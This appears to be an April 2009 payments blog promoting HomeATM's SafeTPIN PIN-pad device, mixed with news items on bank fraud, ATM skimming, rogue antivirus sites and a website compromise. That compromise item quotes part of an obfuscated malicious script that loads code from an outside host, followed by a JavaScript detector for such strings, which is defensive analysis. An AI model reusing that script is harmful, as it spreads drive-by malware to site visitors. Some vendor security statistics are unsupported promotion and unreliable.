Thursday, April 9, 2009

American Banker Article on HomeATM

American Banker
Remittance Use Seen for Online PIN Debit Device

Thursday, April 9, 2009
By Will Hernandez

HomeATM ePayment Solutions, which offers a system that lets people make online purchases with PIN debit cards, is now promoting its technology for remittances and online banking.

(Editor's Note:  That's not to say that we're NOT promoting it for use with eCommerce transactions.  We most certainly are.  In fact, our device provides the ONLY "TRUE PIN Debit" application...as it enables a "card present" transaction.  By definition, a software-based application is and always will be, a "card not present" transaction... therefore it would not qualify for "card present" Interchange rates...let alone card present PIN Debit Interchange.)



The Montreal company said last month that its SafeTPIN device meets the Payment Card Industry data security standard, and Ken Mages, HomeATM's chairman and chief executive, said last week that his company had signed a deal with a foreign remittance company that plans to distribute 250,000 of the devices to U.S. consumers, who could use them to send money to their home countries. He would not name the remittance company or say where it is based. 

"Once those units are out there, they do us a lot of good because they can be used for any merchant who wants to use our payment method," Mages said.

The SafeTPIN devices incorporate both a card reader and PIN pad; it plug(s) into a computer's USB port.  Participating Web sites prompt users to swipe their debit cards and enter their PIN to complete the transaction.

John B. Frank, HomeATM's executive adviser, said the PCI certification could make online merchants more willing to accept the device since HomeATM would be liable for any breach linked to a SafeTPIN.

Editor's Note:  That's fine, what's printed above, however, my actual quote was this: "One of the major benefits to merchants who would choose to utilize HomeATM's PCI 2.0 PED certified device is that it would effectively remove them from the scope of PCI DSS compliance, and that fact alone could save them hundreds of thousands, if not millions of dollars."  But I'll go with American Banker's quote...Here's why:

HomeATM's solution Triple DES encrypts the "entire" transaction in our PCI 2.0 PED certified device (including the Track 2 data) AND utilizes DUKPT key management.  So we not only have TRUE PIN Debit, but we have TRUE end-to-end encryption (E2EE).  Even in the unlikely event a hacker was to intercept a transaction, (and unencrypt it, and get lucky and guess the PIN) they would have ONE card.  That's it.  DUKPT key management assigns an individual key to each transaction.  Since hackers, like water, find the path of least resistance, I don't think they'd exhaust the time and effort necessary to enable them to try and "guess" the PIN ...in order to obtain the information for just ONE card.  I think it's much more likely that they'd go after a software application as software is 92 million times easier to breach...which is why 92% of all breaches are software related.

Continuing on with the American Banker article:

The device is also easy to use in sending remittances, Frank said.  

A dedicated Web site prompts the sender to enter his name and e-mail address, the recipient's name and e-mail address and the amount. The sender also selects a security question, the answer to which is known by both parties. The sender then swipes his or her card and enters the PIN to complete the transaction. (Senders can also use credit cards by using the same PIN that they already use for automated teller machine withdrawals.) Both the sender and recipient receive a confirmation by e-mail. To claim the money, the recipient visits the Web site, answers the security question and swipes his or her debit card through a SafeTPIN device and enters a PIN. The funds are instantly transferred to the recipient's checking account.

"It's user-friendly," Frank said. "Consumers (have been swiping their cards at retail locations for years) already know how to go to a retailer, swipe their card and enter a PIN." 

Mages said his company has not yet set a price for the SafeTPIN devices; he expects merchants and banks to take the lead in distributing them to consumers.

HomeATM will also offer the device to banks as a tool to authenticate online banking customers. 

SafeTPIN is more secure than the user name-password combination widely used today, Mages said. "If someone puts malware on your computer and they are keylogging the strokes or they phished you to a third party, they are going to be able to read your bank account."


Paul Turgeon, a senior consultant at the research firm Payments and Processing Consultants, in Chicago, said that consumers' online banking passwords can be hacked but that a hardware device offers strong security. 

Turgeon formerly worked at Metavante Technologies Inc.'s NYCE Payments Network LLC debit unit, where he helped develop a similar card reader for consumers, SafeDebit.


He said HomeATM's device is a "reasonably affordable and very good" product but that the technology is not an issue. Merchants and banks that would consider offering the devices to consumers need to believe it is worth the investment.

Merchants will wonder "how many consumers is it going to get for me," he said, and banks will ask "what is the interchange rate." (The answer is TRUE card present, PIN Debit published rates)  Any kind of Internet PIN-debit product will face challenges until something can "get enough mass to get both parties interested."  Editor's Note:  Challenges are fun. 

Turgeon also said the Federal Financial Institutions Examination Council has required two-factor authorization for online banking for some time "and no one I know is doing it very well."

















Internet Hacker Hits Bank Accounts

Internet hacker hits bank account - Local News - Rotorua Daily Post

By CHERIE TAYLOR, cherie.taylor@dailypost.co.nz

Eleven Rotorua people are accused of hacking into online bank accounts and stealing thousands of dollars in an elaborate internet scam.  One of the accused has admitted her role in the widespread fraud ring that targeted the National Bank.  Nine others have been remanded without plea after appearing in Rotorua District Court yesterday, and one is wanted by police after failing to show up.

The Daily Post can today reveal details of the scam which involved people using the bank's secure website to access accounts and transfer money from one account to another, creating credits in their own or a nominated bank account. 
Editor's Note:  Wait until the professionals get crackin'!

The woman who pleaded guilty yesterday was Rotorua's Lauren Sainty, an unemployed 25-year-old.  She stole nearly $6000 and the nine others are accused of stealing about $56,000 and allegedly attempting to steal a further $25,000.

Sainty pleaded guilty to one charge of accessing the National Bank website on December 18 last year, gaining $2998 and three counts of gaining pecuniary advantage by obtaining cash amounts of $198, $2000 and $800 on the same day.

The police's summary of facts states that from June 2008, a small group of people in Hamilton found a way to access the National Bank internet website and transfer money from one account to another, creating credits in their own or a nominated bank account.  The money was then withdrawn the next day before the money was dishonoured for insufficient funds. This then put both accounts into overdraft.  The scheme became widely known to criminals in the following months before the scam was picked up, the summary states.

In November, the scale of transactions and reversals became large enough to become noticed in the banking world.  By late November, the matter was reported to police.

Judge Chris McGuire noted Sainty was a first-time offender and sentenced her to 150 hours' community work and ordered her to repay $2998 to the bank.  When contacted by The Daily Post, ANZ National Bank spokeswoman Jessamy Malcolm-Cowper said she was unable to make specific comments as the matter was still before the courts.  Meanwhile, nine other people appeared before the registrar yesterday and did not enter pleas to the charges they each faced.  All were remanded on bail to appear back in court on April 27. An arrest warrant has been issued for Rory Carlaw, 20, after he failed to show up yesterday.

THE ACCUSED

  • Chantelle Rangitaitaia Green, bartender, 21, two counts of accessing a National Bank internet website in an attempt to steal $11,000.
  • Tracy Gail Dawn Anson, 19, unemployed, one charge of accessing the National Bank internet banking system dishonestly gaining $6000.
  • Elaine Rewa Jeffery, 44, unemployed, one charge of accessing the National Bank internet website in an attempt to gain $3000.
  • Jordan Moke, 18, one charge each of accessing the National Bank internet website to dishonestly obtain $1000, dishonestly using an ANZ debit card to obtain cash and cultivation of cannabis.
  • Tyrone Benjamin Moke, 21, unemployed, two charges of accessing the National Bank internet website to gain $4048 and $1000 plus three counts of using his own bank card withdrawing $800, $2000 and $202.
  • Deidre Anne Heta, 31, solo parent, 11 charges of illegally using her bank card to withdraw a total of $5191.
  • Brian Charles Brogden, 30, unemployed, one charge of accessing the National Bank internet website in an attempt to gain $2000.
  • Wallace Waiariki, 42, table hand, one count of accessing the National Bank internet website in an attempt to gain $4000.
  • Owen Dlyakiya, 20, from South Africa, one charge of accessing the National Bank internet website dishonestly gaining $4672 and four charges of using his bank card to dishonestly gain a total of $4673.
  • Moanata Janey Karaitiana, 23, unemployed, five charges of accessing the National Bank internet website to gain $20,700 and 35 charges of using debit cards to gain $11,739.
  • Rory Carlaw, 19, plasterer, one charge of accessing the National Bank internet website in an attempt to gain $5000 and one charge of possession of cannabis - warrant issued to arrest.


Online Sales in Germany Rising

April 9, 2009
German Online Sales Rose Last Year
Despite endemic economic losses in Europe in 2008, online sales in Germany experienced healthy growth. Full Article


PIN Debit Payments Blog: Book 'em Danno! Cybercrime Thrives in Hawaii


Book 'em Danno! Cybercrime Thrives in Hawaii

Cybercrime thrives in Hawaii, 8th in nation in e-criminals per capita
Hawaii ranks 8th nationally in online criminals per capita


By Peter Boylan - Advertiser Staff Writer

White-collar crooks using the digital domain to commit crime are prevalent in Hawai'i, as the state ranks in the top 10 for highest number of perpetrators per 100,000 residents, according to FBI statistics.

There were 44.Five-O alleged electronic fraud criminals per 100,000 residents in Hawai'i last year, putting the state eighth on the FBI's watch list. Hawai'i trails New York, Delaware, Florida, Montana, Washington, Nevada and Washington, D.C.

"We are very concerned with the victimization in Hawai'i in particular because the culture of our Islands is one of trust. Thus, many times our victims just could not believe it would happen to them," U.S. attorney Ed Kubo said.

"Those who are perpetuating Internet crimes feel that they can hide behind the cloak of secrecy when they scam our innocent victims out of their hard-earned money. These criminals do not care what circumstances their victims are in as long as they can successfully get their ill-gotten gains.

"What bothers me about this trend of Internet crime is that in this technological age, these types of crimes are increasing at a faster rate than other crimes."

Hawai'i averages about 800 Internet criminal complaints every year.

In 2007, Hawai'i residents reported Internet fraud losses of more than $1 million, with auction fraud and failure to deliver paid-for merchandise the most prevalent forms of online crime.

Users of eBay and other online auction houses are required to pay for their merchandise before receipt. Often, Internet fraud purveyors will post pictures of merchandise that does not exist. The winner of the auction will send a payment using a credit card or third-party transaction handler such as PayPal.

The criminal will keep the money and after about a week, when the merchandise doesn't arrive, the purchaser will file a complaint with the auction house. By the time the complaint is forwarded to law enforcement officials, the criminal is often long gone, law enforcement officials said.

The FBI has warned that given the global economic woes, identity thieves and Internet fraud schemes are on the rise. Hawai'i had the 17th-highest rate of complaints per 100,000 residents in 2008 with 84.92.

"Internet crime is something we are closely monitoring in Hawai'i. Given what our data shows us, regarding the frequency of these complaints happening in the state, we urge the public to be vigilant with their personal information whenever they are working, shopping or playing online," said FBI special agent Brandon Simpson.

Continue Reading at Honolulu Advertiser




Wednesday, April 8, 2009

Acculynk Claims Consumers Like Their Solution

Editor's Note:  This came across the news wires today and in fairness, I thought I'd share it with the PIN Payments News Blog readers.  After speaking with HomeATM CEO and Chairman, Ken Mages, he asked me to remind readers what he said a couple weeks back: PIN on PED vs. PIN on the Web

"I'll make this last promise or take a lunch bet with anyone...that once software PIN goes live, within a month, an FTP site will arise with its users' PAN and PIN numbers.  I One-Hundred-Percent (100%) guarantee it."  - kgm - Chairman/CEO - HomeATM ePayment Solutions

To read a White Paper comparison on "Hardware vs. Software" Security Click the Picture Above Left (PIN Debit Payment PDF) and it will open.  Here's Acculynk's Press Release:



Study Finds New Payment Software PaySecure Increases Debit Cardholder Confidence Online

Secure PIN Debit Payment Method Could Increase Online Debit Card Transactions and Lead to Additional Internet Purchases

SAN FRANCISCO--(BUSINESS WIRE)--A new Javelin Strategy & Research (www.javelinstrategy.com) study reveals that a majority of surveyed debit cardholders feel confident about using their personal identification number (PIN) to make online purchases with PaySecure, a new Internet PIN debit payment method provided by Acculynk.

The study, commissioned by Acculynk and PULSE, evaluated debit cardholder perceptions and attitudes about PaySecure, and included 500 U.S. debit card users who purchased online in the last year. Participants used PaySecure for a mock online purchase and then answered a series of questions about their experience using the product.


According to the study, 80% of survey participants would use PaySecure when it is presented by a trusted merchant, 65% of survey participants would feel safer buying on the Internet with PaySecure, and 48% would buy more often on the Internet if they could pay with PaySecure.


“Our research shows that consumers are more willing to complete an online purchase when they feel the transaction is secure,” said James Van Dyke, Founder and President of Javelin.

“In the current economic climate, debit payment methods that increase consumers’ perceived security will be preferred by more consumers.”


Key Findings From the Custom Survey:


Methodology

The study was commissioned by PaySecure provider Acculynk and PULSE and conducted by Javelin Strategy & Research. The study, conducted in March, 2009, recruited 500 U.S. adults to participate. Participants were targeted to obtain U.S. nationally representative groups based on age, gender and annual household income. To qualify for the study, participants were required to use their debit card for at least 40% of point of sale purchases and Internet purchases, and made a purchase on the Internet in the last twelve months. Participants used the PaySecure PIN-pad for a mock online purchase and then completed a survey of agree/disagree questions to question the product’s ease of use, consumer acceptance and perceived security. Agreement for an item was determined as 7 or greater on a 10 point scale.

About Javelin Strategy & Research

Javelin is the leading independent provider of quantitative and qualitative research focused exclusively on financial services topics. Based on the most rigorous statistical methodologies, Javelin conducts in-depth primary research studies to pinpoint dynamic risks and opportunities. Javelin helps its clients achieve their initiatives through three service offerings, including syndicated research subscriptions, custom research projects and strategic consulting. Javelin’s client list includes some of the largest banks, credit unions, card issuers, and technology enterprises in the financial services industry. For more information about this or other Javelin reports, please visit www.javelinstrategy.com/research or call (925) 225-9100.

About Acculynk

Acculynk is a leading technology provider with a suite of software-only services that secure online transactions. Backed by a powerful encryption and authentication framework protected by a family of issued and pending patents, Acculynk’s services provide greater security, reliability, convenience and return on investment for consumers, merchants, networks, issuers and acquirers. For more information, visit www.acculynk.com.

About PULSE

PULSE is one of the nation’s leading ATM/debit networks, currently serving more than 4,500 banks, credit unions and savings institutions across the country. PULSE is owned by Discover Financial Services (NYSE: DFS). The network links cardholders with more than 289,000 ATMs, as well as POS terminals at retail locations nationwide. The company is also a valued resource for industry research related to electronic payments and is committed to providing its participants with education on evolving products, services and trends in the payments industry. For more information, visit www.pulsenetwork.com.
Contacts

Javelin Strategy & Research
Kathleen McCabe, +1-925-225-9100 ext. 15
Marketing Director
k.mccabe@javelinstrategy.com

Permalink:
http://www.businesswire.com/news/google/20090408005322/en


















82% Concerned About Private Label Prepaid Cards

Private Prepaid Cards Take Lumps From Recession: Survey - 04..2009 - U.S. Banker Article
U.S. Banker | April 2009
By Joseph Rosta

Private-label prepaid cards are losing their luster because of the recession, according to an Aite Group research note based on a survey of 21 card industry executives.

Eighty-two percent of those participating say current economic conditions are having a “somewhat to very adverse” impact on the sale of private-label cards, as expanding retailer bankruptcies stoke consumer fears they could be stuck holding worthless and unredeemable gift and other prepaid cards from defunct chain stores.

Continue Reading



ATM Skimming Victims Lose $50K (Video)

wgrz.com | Buffalo, NY | ATM Skimming Victims Lose More Than $50,000

The United States Attorneys Office announced Tuesday it's prosecuting a Romanian man for stealing more than $50,000 through a scam known as ATM skimming.

Assistant U.S. Attorney Aaron Mango said Tiberiu Szebeni, 29, used an electronic faceplate, known as a skimmer, to steal account information from ATM customers. Typically, the device sits on top of the slot in which bank cards are inserted.

"When you put your card into the ATM, it passes through this skimming device, and the skimming device then records all of the information on your card," Mango explained.

Once the thieves have that information, all they need is your pin number. Mango said that's typically obtained through the use of a tiny, pinhole camera with a view of the keypad, but he said thieves may also utilize a high-powered, zoom camera stationed somewhere in the distance.

Mango said once Szebeni obtained both the account and pin numbers, he transferred that information to empty store gift cards. Then, by using the magnetic strip in each card, Mango said Szebeni essentially turned each one into a clone of the original ATM card.

Federal prosecutors have charged Szebeni with use of a fraudulent access device with intent to defraud. Secret Service agents arrested him at the Rainbow Bridge on March 31st after a tip from a Rochester resident led them to the Romanian citizen.

Continue Reading









Paul McCartney Website LuckySploited



Source: scmagazineus
Complete item: http://www.scmagazineus.com/Paul-McCartneys-website-hacked-to-distribute-malware/article/130330/

Description:
The official website for former Beatle Paul McCartney was compromised to infect users through drive-by downloads.

The site was attacked by the LuckySploit toolkit, according to web security firm ScanSafe, which discovered the hack. The toolkit was recently updated to include a set of HTML files that contain obfuscated and malicious JavaScript code, according to NoVirusThanks.org, a computer security website.

ScanSafe said in a statement that its researchers discovered the infection on Saturday, the same day McCartney reunited on stage with Ringo Starr for the first time in years. The toolkit was hidden behind an invisible frame on the site. When users visited, their machines were hit with an exploit that downloaded a rootkit.

Once the rootkit is installed "behind the scenes" on the victim's computer, thieves could steal personal information, such as credit card details and login credentials, according to ScanSafe.

"Once your computer is infected with a rootkit, none of your personal information is safe," said Spencer Parker, director of product management for ScanSafe, in a statement. "This is an extremely attractive target for cybercriminals given the level of attention McCartney is receiving at this moment."

McCartney's site quickly was fixed, according to ScanSafe. It is unclear how many users were compromised. A representative for the musician could not be reached for comment on Tuesday.


Related:

The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million dollar commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual inasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions facilitate Zeus' activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

 var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i


Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.


Source: E-Secure-IT
https://www.e-secure-it.com
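
The embedded script quoted above hides its tag behind a fixed character shift: every character of the injected script tag is moved up by one code point and shifted back by a short loop when the page loads. As an added example (not code from E-Secure-IT, ScanSafe or this blog), the JavaScript below scans page source for string literals that decode to a script tag under a small shift, which goes slightly beyond the single shift-by-one case shown; the function names, the constructed sample page and the 192.0.2.10 documentation address are assumptions for illustration.

```javascript
// Added example: flag string literals that hide a <script> tag behind a
// fixed character shift, the obfuscation style shown in the quoted sample.

// Shift every UTF-16 code unit of `s` by `delta` (a negative delta undoes
// a positive shift). String.fromCharCode wraps to 16 bits, so it never throws.
function shiftString(s, delta) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode(s.charCodeAt(i) + delta);
  }
  return out;
}

// Pull quoted string literals out of raw page source.
// Heuristic only: this is a regex scan, not an HTML or JavaScript parser.
function extractStringLiterals(source) {
  const re = /(["'])((?:\\.|(?!\1)[^\\])*)\1/g;
  return Array.from(source.matchAll(re), (m) => m[2]);
}

// Try small shifts in both directions on one literal; return the first
// decoding that contains a script tag, or null if none does.
function decodeLiteral(literal, maxShift) {
  for (let d = 1; d <= maxShift; d++) {
    for (const delta of [-d, d]) {
      const decoded = shiftString(literal, delta);
      if (/<script\b/i.test(decoded)) {
        const src = decoded.match(/src\s*=\s*["']?([^"'\s>]+)/i);
        return { shift: delta, src: src ? src[1] : null, decoded };
      }
    }
  }
  return null;
}

// Scan a whole page. Shift 0 is never tried, so ordinary quoted markup
// containing a plain <script> tag is not reported.
function findShiftedScripts(source, maxShift = 3, minLength = 16) {
  const hits = [];
  for (const literal of extractStringLiterals(source)) {
    if (literal.length < minLength) continue; // too short to hold a tag
    const hit = decodeLiteral(literal, maxShift);
    if (hit) hits.push(hit);
  }
  return hits;
}

// Constructed sample page. The hidden tag points at a documentation-range
// address and is encoded here with the same +1 shift as the quoted sample.
const HIDDEN_TAG = '<script src="http://192.0.2.10/stats/ga.js"></script>';
const SAMPLE_PAGE = [
  '<html><body><p>Welcome</p>',
  '<script>var source ="' + shiftString(HIDDEN_TAG, 1) + '"; var result = "";</script>',
  '<script src="/js/site.js"></script>',
  '</body></html>',
].join('\n');

for (const hit of findShiftedScripts(SAMPLE_PAGE)) {
  console.log('shift ' + hit.shift + ' hides a script tag loading ' + hit.src);
}
```

Run over the files of a site suspected of this kind of compromise, any hit is worth comparing against a known-good copy of the page, since the text above notes that flat HTML-only sites were affected as well.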






HomeATM Press Release

With PCI PED 2.0 Certification in Hand, HomeATM Targets Funds Transfers

HomeATM Announces Strategic Partnership to Deploy 250,000 Terminals with Major Remittance Provider

FOR IMMEDIATE RELEASE


PRLog (Press Release) – Apr 08, 2009 – Chicago: HomeATM ePayment Solutions, a leading provider of secure hardware and software solutions, today announced that it has signed a contract with a major remittance provider to provide 250,000 Safe-T-PIN (TM) terminals to its customers.

The Safe-T-PIN point of sale terminal, manufactured by HomeATM, is the first ever Internet PED to achieve PCI PED 2.0 certification from the Payment Card Industry. Safe-T-PIN provides secure two factor authentication for e-commerce transactions and secure log-in.


When combined with HomeATM's proprietary electronic money transfer platform, the SafeTPIN allows consumers and businesses alike, to swipe any bank card, enter their PIN and transfer money in real-time to the recipient.

With the HomeATM Funds Transfer application, it's no longer necessary to go through the hassles of driving or walking to a money transfer location to send or receive money. It can be done in the safety of your own home in real time. HomeATM also eliminates the burden of having to preload third party cards...simply swipe your existing bank card, enter your PIN and send. The recipient swipes their bank card, enters their PIN and receives. Nothing could be more simple.

The pocket-sized Safe-T-PIN(TM) is USB "plug and play," eliminating the need for drivers or downloads. Additionally, it works with any operating system or browser. The device provides users with the added convenience of swiping their cards versus keying in their numbers and will work with any bank, card processor, and currency. The significance of this feat is that bank/military grade encryption (including 3DES and DUKPT key management) of financial data from beginning to end, is now affordable to the masses.

SourceMedia's ATM&Debit News has featured HomeATM on a front page article in their latest issue which you can access at www.HomeATMBlog.com

About HomeATM's Safe-T-PIN (tm)

The HomeATM Safe-T-PIN is the world's only PCI PED 2.0 Certified E-Commerce Device.  Employing Triple DES Encryption and DUKPT Key Management, it provides complete end-to-end encryption protecting the user's card data from beginning to end.

About HomeATM

HomeATM owns a global patent for secure Internet PIN based transactions. Leveraging our E2EE PCI 2.0 PED certified solution, a merchant or remitter can move funds from their bank account or open loop/closed loop payment card in real-time. Utilizing HomeATM's patented solution with a bank issued card alleviates the burden for merchants to address fraud issues as HomeATM leverages the issuing bank's KYC/AML (Know Your Customer/Anti-Money Laundering) protocols. No other payment solution serves Person-to-Person, Business-to-Consumer, Business-to-Business, and Mobile Payments with the speed, security and cost-effectiveness of HomeATM. HomeATM is EMV ready and already enjoys strategic relationships with Cardinal Commerce and UATP.

For further information, visit: www.HomeATMBlog.com or contact Mitchell Cobrin, COO mcobrin@HomeATM.net

# # #






Wolf in Sheep's Clothing - Security Software

Rogue security software now a top threat - Computer Business Review : News
Rogue security software now a top threat
Published:08-April-2009 | By Kevin White

Microsoft charts rise of malware in fake security software

(Editor's Note:  I've provided examples of Rogue Software Sites below)

Security intelligence gathered by Microsoft Corp shows a significant increase in rogue security software or ‘scareware’ that lures people into paying for protection that, unknown to them, is actually malware often designed to steal personal information.

According to the latest Microsoft Security Intelligence Report released today, rogue programmes known as Win32/FakeXPA and Win32/FakeSecSen were detected on more than 1.5 million computers.

Win32/Renos, another threat that is used to deliver rogue security software, was detected on 4.4 million unique computers, an increase of 67% over the first half of 2008.

Vinny Gullotto, general manager of the Microsoft Malware Protection Centre said, "We see cybercriminals increasingly going after vulnerabilities in human nature rather than software.”

He said the security industry needs to combat the next generation of online threats through a community-based defence and broad industry cooperation with law enforcement and the public.

Rogue security software and other social engineering attacks compromise people's privacy and are costly; some take personal information and tap into bank accounts, while others infect computers and rob businesses of productivity.

Steps can be made to counter the problem, and the report recommends that security managers always configure computers to use Microsoft Update instead of Windows Update.

They should also use the Microsoft Security Assessment Tool (MSAT) to help assess weaknesses in their IT security environment.

Individuals are warned not to follow advertisements for unknown software that appears to provide protection and should avoid opening attachments or clicking on links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.

The report also cited the biggest cause of data breaches as lost and stolen computer equipment, which it reckons makes for 50% of all reported incidents.

PIN Payments News is Providing Warnings on the following rogue sites:


TheGreatSecurity.com is a scam website designed to sell rogue anti-spyware programs. Upon entering the website you will be greeted by a fake online system scan, which returns an exaggerated report full of non-existent infections. Afterwards the website will display some popups, which read:

    "The page at http://TheGreatSecurity.com says:   Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"

or

    "http://TheGreatSecurity.com says:  Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs."

TheGreatSecurity.com is a malicious website, and should therefore be blocked using the HOSTS file.

WWWMobileReads.com is a malicious website, created for only one purpose - to sell rogue anti-spyware programs. WWWMobileReads.com provides a fake online system scan, which will attempt to scare the user with fake threats. Afterwards it will display a few popups with the same reason in mind. The popups read:

    "The page at http://WWWMobileReads.com says:      Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"

or

    "http://WWWMobileReads com says:      Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs."

MobileReads.com is a malicious website and should therefore be blocked using the HOSTS file.

JBF





Attack of the Card Skimmers - Gizmodo

Source: Gizmodo
Complete item: http://i.gizmodo.com/5202776/attack-of-the-card-skimmers-its-happening-right-here-right-now

Description:
Previously on C.S.I... a man found an actual card skimmer in the wild, in the flesh. Today, Gizmodo reader Sean became the card skimmer/PIN camera's latest almost-victim. Where? Chase Bank in Manhattan, East Village.

Sean Seibel was inside a local Chase bank where he inserted his ATM card into one of two side-by-side automatic teller machines. When the machine told him it could not read his card, it took him a bit of jiggling to get his card back. He tried it a couple more times and got the same results. Before trying the other machine, he inspected the slot of the current ATM he was using and realized that it had a false plastic cover attached to the slot. The amazing thing about the cover was that the translucent green plastic matched the card reader slot perfectly, meaning that it was made specifically for Chase ATMs. After snapping a few photos with his iPhone, he alerted the branch manager and explained what happened.

As he was leaving, Seibel remembered reading about card skimmers having small cameras in the proximity in order to read PIN pad activity, so naturally, he went back to the ATM to inspect, which is where he found an extra mirror attached to the vandalized machine that the other ATMs didn't have. Drilled into the mirror was a tiny pinhole with a camera inside, directed at the PIN pad. Seibel alerted the branch manager again and asked Chase why they hadn't inspected the ATM after he had warned them the first time. Chase honestly replied that they hadn't thought of it because they had never encountered that sort of thing before.

Tuesday, April 7, 2009

HomeATM in the News

Click the Graphic on the Left
to Read About HomeATM in the latest edition of ATM&Debit News


HomeATM's PCI 2.0 PED Certification Provides the following benefits:

Card Present Rates in a Card Not Present World!

"TRUE" PIN Debit Interchange Rates!

Dual Authentication!

15 Times More Convenient than Typing in 14-16 Card Number Digits, Expiration Dates and CVV Codes!

Effectively Removes Internet Retailers from the Scope of PCI DSS Potentially Saving Them 100's of Thousands of Dollars!  (Same with Financial Institutions, only they could save million$)

End to End Encryption |Triple DES | DUKPT Key Management | Security

Exponentially Advanced Log-In, Authentication Platform for Online Banking!












Home(r)ATM Would Eliminate Cloning Altogether!


In this ISR News post, it is reported that Credit Card Cloners Stole 3.5 million.

In a nutshell, that's 3.5 Million reasons for using HomeATM's SafeTPIN device.   Without the PIN, a cloned card would be useless.  So would DNS hijacking (redirecting you to a cloned website).  No username/password, instead Swipe your Card, Enter your PIN.  They wouldn't receive the data...unlike the username/password, which they would receive.

In fact, cloning wouldn't be an "issue" (pun intended) at all, if online merchants employed the HomeATM True PIN Debit solution. 

Come to think of it neither would the over exorbitant "Card Not Present" rates...oh...and an end-to-end encryption methodology is certainly an added benefit.  Don't let me forget convenience.  If I can swipe my card 14-16 times faster than entering 14-16 digits from my credit or debit card, then I consider it to be 14-16 times more convenient.  You?  And yes, we do credit...and yes...it would be at "card present" credit card rates.  Any questions?

ISR News: Credit Card Cloners Steal £3.5m
April 7, 2009 by ADMIN



Excerpts From Finextra.com

A gang of five fraudsters who ran a global credit card cloning ring out of a London flat stole £3.5 million in just a few days, a court heard yesterday.

Prosecutor Ben Fitzgerald told Southwark crown court that police found fake cards and counterfeiting technology in the London flat.

The accused allegedly went on a spree between 28 September and 8 October last year as Barclaycard migrated cardholders from the Goldfish credit card business it acquired from Discover Financial Services earlier in the year.

Computer software found in the flat was used to make fake cards before the gang stole £3.5 million, with £645,000 spent on the cards in Britain alone, the court heard.

Khi-San Voong, 46, Qiu Yeu, 46, Qiang Xue, 34, and Dauy Chung, 40, all of Walworth, deny conspiracy to defraud. Cai Caixa, 27, pleaded guilty.

The trial continues...











I Have a Present For You! And a Card!

Card Present vs. Card Not Present

Before you accuse me of luring you to this post with the promise of a "present" and a "card" simply fill out the poll on the right and send me your email and shipping address. You'll get your "card present" enabling SAFETPIN device for free. Take a look at the right sidebar or above for more details.

A recent post by Ed Kountz at the Forrester Blog made me realize that one of the biggest impacts of utilizing a hardware vs. software device is simply this: Interchange.

HomeATM is the only company in the world which can provide e-tailers with a PCI 2.0 PED and thus "card present" TRUE PIN Debit rates. Why do I say true? Because our transactions are conducted in the same manner as a traditional retail location.

In addition, because our device is "ALREADY" PCI 2.0 PED certified, and employs DUKPT key management, we would effectively remove e-tailers from the scope of PCI DSS as no cardholder data is transmitted during the transaction.


Once the consumer has our low cost device, they become a "card present" buyer. They swipe their card, they enter their PIN, and therefore the e-merchant benefits not only from dual-authentication but also from significantly lower interchange fees.

Example:

$200 order at Amazon. Card Not Present Rate: 2% + .25 cents = $4.25
$200 order at Amazon Card Present/ PIN Authenticated: = .75 cents. Savings = $3.50 (In this example an 88% savings!)

Now, add security (PCI 2.0 PED), add convenience (isn't swiping the card 14 to 16 times faster than typing in your 14-16 digit card number?), deduct chargebacks, add familiarity (don't you swipe your card in the store?) and our SafeTPIN is a compelling value proposition.

On the flip side, a software based PIN Debit application would still be a "card not present" transaction. The CNP PIN rate doesn't exist, but the EFT networks could create one. Of course, it will be exorbitantly higher than a Card Present PIN transaction. Remember when transactions were done with the device pictured on the left? Well unlike that device, HomeATM's SAFETPIN is built for the long run...and provides safer, more secure and thus lower rates.

So at the end of the day, our device (which is also EMV ready) is built with consumers, banks and merchants in mind. A software application is built with only the EFT Switches in mind. So it's no wonder the EFT switches are backing it. It's like Microsoft paying people to use Live Search with their Cashback program. The EFT switches are getting paid to push a software application. But what will be the public's uptake? And where's the benefit to the merchants? A tiny savings on Interchange...in exchange for a higher risk of liability in the instance of a breach? It's all interesting. I would think that the merchants would want a bigger savings and less risk, which is what HomeATM's PCI 2.0 PED provides. Wouldn't you? We'll see...

Here's the article showing the pent up frustration with Interchange Fees from the NRF, the NGA and NACCS (The Big 3). They are all bricks and mortar organizations and are still throwing a fit about Interchange Rates. When will the Internet Retailer 500 band together and start demanding that they at least be afforded the opportunity to enjoy the rates the "Big 3" are unhappy with?





Transacting Value: The Impact of Credit Industry Challenges on Card Marketing
Ed Kountz - April 6th 2009

Early on in this blog, I predicted that 2009 would see an increase in the number and stridency of calls for reforms to the U.S. credit card market, particularly in terms of types and amounts of acceptable fees. The Federal Reserve’s December 2008 card industry changes certainly made clear that this was happening. But now, the long-simmering brew appears to be spreading.

Two recent events serve to validate the premise:


